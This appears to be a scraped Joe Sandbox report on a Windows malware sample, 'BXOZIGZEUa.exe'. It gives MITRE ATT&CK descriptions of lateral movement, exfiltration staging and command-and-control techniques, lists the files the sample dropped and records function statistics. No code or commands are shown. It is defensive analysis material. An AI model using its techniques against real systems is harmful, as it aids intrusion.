Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report BXOZIGZEUa.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_JdEV.exe_cd8f4618334c72b9a4dd6cfe872fc24dcdd0ad_684e5ed5_1f862b9f-9f84-4862-8f2a-e2d1585e962a\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD00E.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD167.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1A7.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\k1[1].rar

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\k2[1].rar

C:\Users\user\AppData\Local\Temp\3B2E4D6A.exe

C:\Users\user\AppData\Local\Temp\44FA2422.exe

C:\Users\user\AppData\Local\Temp\JdEV.exe

C:\Windows\INF\oem0.PNF

C:\Windows\INF\oem1.PNF

C:\Windows\INF\oem3.PNF

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

Windows Analysis Report
BXOZIGZEUa.exe

Function 001CE757 Relevance: 103.8, APIs: 48, Strings: 11, Instructions: 559
libraryloaderstringCOMMON

Function 001C2540 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 445
memoryCOMMON

Function 00366044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Function 001CB7F2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124
filestringCOMMON

Function 001CE141 Relevance: 64.8, APIs: 43, Instructions: 304
COMMONLIBRARYCODE

Function 00237836 Relevance: 42.4, APIs: 22, Strings: 2, Instructions: 421
windowCOMMON

Function 001CA0E9 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
COMMON

Function 001D1323 Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMONLIBRARYCODE

Function 0024BD98 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 39
COMMON

Function 001C1B60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 237
COMMON

Function 001CF00F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 001C1FF0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 244
fileCOMMON

Function 002D86C3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre